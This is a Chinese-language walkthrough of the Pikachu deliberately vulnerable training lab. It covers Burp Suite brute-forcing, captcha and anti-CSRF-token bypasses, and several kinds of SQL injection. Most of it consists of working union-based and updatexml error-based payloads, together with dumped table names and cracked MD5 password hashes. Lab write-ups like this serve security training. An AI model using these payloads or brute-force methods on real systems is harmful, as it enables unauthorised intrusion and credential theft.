pikachu靶场

基于表单暴力破解

看一下界面,有两个输入框,使用暴力破解使用Cluster bomb


前提须知是

Sinper 对$$符号标记的数据进行逐个替换

Battering ram 对$$符号标记的数据同时替换

Pitchfork 多参数,使用不同字典

Cluster bomb 多参数做笛卡尔乘积模式爆破,多个位置,交叉组合



bp抓包,发送到intrude,修改标记内容



设置payloads,set 1 2 type设置为simple load字典 进行 start attack, 将length大小排序就出来了

验证码绕过(on server)

比上面多了一个验证码,用bp抓包看下



尝试了几次账号密码都没提示验证码的问题,说明验证码可以一直用,那就和上面思路一样暴力破解

验证码绕过(on client)

尝试输入,发现会有弹窗,那就是前端,查看前端关于验证码的代码,createCode()



老样子的配置进行,依旧成功,前端验证bp都能无视

token防爆破

一看没有验证码了,token搜索下含义,令牌,验证,防止csrf攻击,



尝试下bp显示csrf token error,每次token都会变



再尝试删除token,response中什么返回结果都没有,发现前端代码hidden,token,value的代码尝试是下一次的token



攻击模式选择Pitchfork,因为Cluster bomb是三组payload排列组合,所以使用一对一的

第三个payload type设置为Recursive grep



先在这个界面选择打勾然后add

双击下图value的内容就自动填写正则表达式了



还需要将线程设置为1,因为每次都要用上次response中返回的token,多线程就会乱



最后一步开跑就结束了

数字型注入

看一下源码,没有任何处理,那直接bp抓包修改



id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2

发现order by 3 报错,order by2 正常,字段数就是2



正常走流程爆库

id=1 union select 1,database()#

pikachu



爆表

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 httpinfo,member,message,users,xssblind



爆字段

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#

id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name



下面就是字段里的数据了

1 union select username,password from users#

e10adc3949ba59abbe56e057f20f883e

670b14728ad9902aecba32e22fa4f6bd

e99a18c428cb38d5f260853678922e03

像是md5解码,md5在线解密下

123456

000000

abc123

字符型注入

看一下源码,需要考虑闭合是单引号



输入万能注入,有变化证明语句正确

1' or 1=1#



判断字段数,道理同数字型注入

1' order by 2#



爆库

1' union select 1,database()#

pikachu



爆表

1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

httpinfo,member,message,users,xssblind



爆字段

1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password



爆值

1' union select username,password from users#

your uid:admin

your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu

your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test

your email is: e99a18c428cb38d5f260853678922e03

同理用md5解密

XX型注入

查看源码,单引号和括号



尝试一下

1') or 1=1#

成功了,按照流程继续



爆库

1') union select 1,database()#

pikachu



爆表

1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

httpinfo,member,message,users,xssblind



爆字段

1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password



爆值

1') union select username,password from users#

your uid:admin

your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu

your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test

your email is: e99a18c428cb38d5f260853678922e03

搜索型注入

查看源码,单引号和百分号



1%' or 1=1#

成功了,那还是老流程



判断字段数,这个是到4才显示错误

1%' order by 4#

字段数就是3了



爆库

1%' union select 1,2,database()#

pikachu



爆表

1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

httpinfo,member,message,users,xssblind



爆字段

1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password



爆值

1%' union select username,password,3 from users#

username:admin

uid:e10adc3949ba59abbe56e057f20f883e

email is: 3

username:pikachu

uid:670b14728ad9902aecba32e22fa4f6bd

email is: 3

username:test

uid:e99a18c428cb38d5f260853678922e03

email is: 3

"insert/update"注入

查看源码,会对字符进行转义,联合注入就不能用了,进行报错注入



bp在注册界面抓包,爆库

1' or updatexml(1,concat(0x7e,database()),1) or'



爆表

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'



爆字段

1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'



爆值

1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'

"delete"注入

查看源代码,

File inclusion(local)

先查看源码,无限制,

pikachu靶场的更多相关文章

  1. pikachu靶场-XSS

    .Tips: 一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS 由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器): 通过变化不同的scr ...

  2. 利用xampp集成环境搭建pikachu靶场及部分问题解决

    xampp的环境部署 1.本地服务器的搭建 首先要到官网下载xampp https://www.apachefriends.org/zh_cn/index.html 有各个不同的系统版本,这里我们选择 ...

  3. Pikachu靶场SSRF学习

    下载Pikachu靶场:https://github.com/zhuifengshaonianhanlu/pikachu Windows用phpstudy也行,记得要改config.inc文件 打开S ...

  4. Pikachu靶场SQL注入刷题记录

    数字型注入 0x01 burp抓包,发送至repeater 后面加and 1=1,and 1=2 可判断存在注入 0x02 通过order by判断字段数,order by 2 和order by 3 ...

  5. pikachu靶场-CSRF

    xss和csrf区别: CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏. PS: 由于之前将php5升级到php7,导致靶场环境出现以下问题 ...

  6. Pikachu靶场通关之XSS(跨站脚本)

    一.XSS(跨站脚本)概述 Cross-Site Scripting 简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS.一般XSS可以 ...

  7. pikachu靶场-暴力破解(验证码、token)

    甲.基于表单的破解 较为简单,直接BurpSuite爆破. 乙.验证码绕过(on server) 打开题目,比第一题多了一个验证码验证,很多初学者遇到验证码就会感觉不知所措.其实这题也较为简单,首先正 ...

  8. pikachu靶场XSS详解

    一.反射型XSS 1.get型 源码前后区别 前 <form method="get"> <input class="xssr_in" typ ...

  9. 关于暴力破解的一些学习笔记(pikachu)

    这几天的笔记都懒得发博客都写在本地了,随缘搬上来 什么是暴力破解 就是在攻击者不知道目标账号密码情况下的,对目标系统的常识性登陆 一般会采用一些工具+特定的字典 来实现高效的连续的尝试性登陆 一个有效 ...

  10. 从零开始的白帽子学习--stage1--常见漏洞类型介绍--part3--不安全的文件上传

    Q:什么是文件上传漏洞 A:文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像.上传附件等等.当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型.后缀名.大小等 ...

随机推荐

  1. 【源码系列#01】vue3响应式原理(Proxy)

    专栏分享:vue2源码专栏,vue3源码专栏,vue router源码专栏,玩具项目专栏,硬核推荐 欢迎各位ITer关注点赞收藏 在学习 Vue3 是如何进行对象的响应式代理之前,我想我们应该先去了解 ...

  2. 文心一言 VS 讯飞星火 VS chatgpt (139)-- 算法导论11.4 3题

    三.用go语言,考虑一个采用均匀散列的开放寻址散列表.当装载因子为 3/4 和 7/8 时,试分别给出一次不成功查找和一次成功查找的探查期望数上界. 文心一言: 在开放寻址法中,当散列表的装载因子超过 ...

  3. 🔥🔥Java开发者的Python快速进修指南:实战之跳表pro版本

    之前我们讲解了简易版的跳表,我希望你能亲自动手实现一个更完善的跳表,同时也可以尝试实现其他数据结构,例如动态数组或哈希表等.通过实践,我们能够发现自己在哪些方面还有所欠缺.这些方法只有在熟练掌握之后才 ...

  4. Docker 安装教程

    一.离线安装 一.CentOS 离线安装 一.下载地址 1.选择系统的型号,选择linux-CentOS 下载地址 2.上传文件到CentOS 服务器 #选择文件 rz 二.开始安装 1.解压压缩包 ...

  5. QT最小化程序到托盘运行

    MinTray 说明 实现程序关闭时最小化托盘的功能 托盘实现显示主页面和退出的功能 支持扩展,直接引用TrayIcon类即可,对外暴露接口 单例实现,可复用 警告 注:博主所有资源永久免费,若有帮助 ...

  6. 深入解析LLaMA如何改进Transformer的底层结构

    本文分享自华为云社区<大语言模型底层架构你了解多少?LLM大底层架构之LLM模型结构介绍>,作者: 码上开花_Lancer . 大语言模型结构当前绝大多数大语言模型结构都采用了类似GPT ...

  7. 吉特日化MES配料工艺参数标准版-第二版

    作者:情缘 出处:http://www.cnblogs.com/qingyuan/ 关于作者:从事仓库,生产软件方面的开发,在项目管理以及企业经营方面寻求发展之路 版权声明:本文版权归作者和博客园共有 ...

  8. 关于yolov3在训练自己数据集时容易出现的bug集合,以及解决方法

    早先写了一篇关于yolov3训练自己数据集的博文Pytorch实现YOLOv3训练自己的数据集 其中很详细的介绍了如何的训练自定义的数据集合,同时呢笔者也将一些容易出现的bug写在了博文中,想着的是可 ...

  9. SpringBoot内容协商机制

    1.是什么? SpringBoot内容协商机制是一种实现了内容协商(Content Negotiation)的Web服务器,它可以根据客户端请求的不同,将响应返回给客户端. 在传统的Web服务器中,如 ...

  10. 2024年 为什么不建议新人学习ABAP

    引言 每个应届生都希望自己有良好的职业发展,当他们发现前路难通时,便会寻找更好的出路. "转码"曾经是个很火热的话题.在互联网行业高速发展的年代,转行学代码,入职大厂,升职加薪,是 ...